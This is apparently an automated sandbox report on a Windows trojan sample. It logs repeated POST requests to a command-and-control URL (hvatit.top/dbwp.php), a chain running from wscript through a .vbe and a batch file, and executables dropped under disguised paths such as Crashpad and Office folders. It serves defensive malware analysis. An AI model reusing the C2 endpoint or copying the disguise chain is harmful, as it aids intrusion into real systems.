                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 1436Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2560Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 2552Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: hvatit.top
                                    Source: unknownHTTP traffic detected: POST /dbwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: hvatit.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hvatit.top
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hvatit.top/
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000003311000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hvatit.top/dbwp.php
                                    Source: ChainPortServerBrowsermonitor.exe, 00000004.00000002.1713284618.0000000003665000.00000004.00000800.00020000.00000000.sdmp, KSFasOVYpBufeMshBMPdEDfTcvlm.exe, 00000009.00000002.4112284119.0000000002D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                    System Summary

                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeProcess Stats: CPU usage > 49%
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FB6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00FB6FAA
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CUGzHwzy.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: String function: 00FCEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: String function: 00FCF5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: String function: 00FCEB78 appears 39 times
                                    Source: cuAvoExY41.exe, 00000000.00000003.1650949859.0000000000B16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs cuAvoExY41.exe
                                    Source: cuAvoExY41.exe, 00000000.00000003.1650949859.0000000000B16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs cuAvoExY41.exe
                                    Source: cuAvoExY41.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs cuAvoExY41.exe
                                    Source: cuAvoExY41.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: ChainPortServerBrowsermonitor.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe0.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: WmiPrvSE.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: KSFasOVYpBufeMshBMPdEDfTcvlm.exe1.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: upfc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.troj.evad.winEXE@18/28@1/1
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FB6C74 GetLastError,FormatMessageW,0_2_00FB6C74
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCode function: 0_2_00FCA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00FCA6C2
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Program Files\Microsoft Office 15\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Users\user\Desktop\ddDNduPc.log
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-m1fLYfg6CkBPCrY00CRN
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeFile created: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\surrogateFontdhcpCommon\8R9u62iDagU8Uc7aonuPLC09qlpNFRfyF1hoQ7xLsx4xo5Yd8alS.bat" "
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCommand line argument: sfxname0_2_00FCDF1E
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCommand line argument: sfxstime0_2_00FCDF1E
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeCommand line argument: STARTDLG0_2_00FCDF1E
                                    Source: cuAvoExY41.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: cuAvoExY41.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeFile read: C:\Windows\win.ini
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                    Source: cuAvoExY41.exeReversingLabs: Detection: 65%
                                    Source: cuAvoExY41.exeVirustotal: Detection: 57%
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeFile read: C:\Users\user\Desktop\cuAvoExY41.exe
                                    Source: unknownProcess created: C:\Users\user\Desktop\cuAvoExY41.exe "C:\Users\user\Desktop\cuAvoExY41.exe"
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\surrogateFontdhcpCommon\8R9u62iDagU8Uc7aonuPLC09qlpNFRfyF1hoQ7xLsx4xo5Yd8alS.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe "C:\surrogateFontdhcpCommon/ChainPortServerBrowsermonitor.exe"
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KhSi255NBg.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe "C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe"
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: api-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: api-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: api-ms-win-core-localization-l1-2-1.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: version.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: dxgidebug.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: sfc_os.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: dwmapi.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: riched20.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: usp10.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: msls31.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: windowscodecs.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: textshaping.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: textinputframework.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: coremessaging.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: ntmarta.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: propsys.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: edputil.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: policymanager.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: appresolver.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: bcp47langs.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: slc.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: sppc.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: pcacli.dll
                                    Source: C:\Users\user\Desktop\cuAvoExY41.exeSection loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: version.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exeSection loaded: mmdevapi.dllJump to behavior
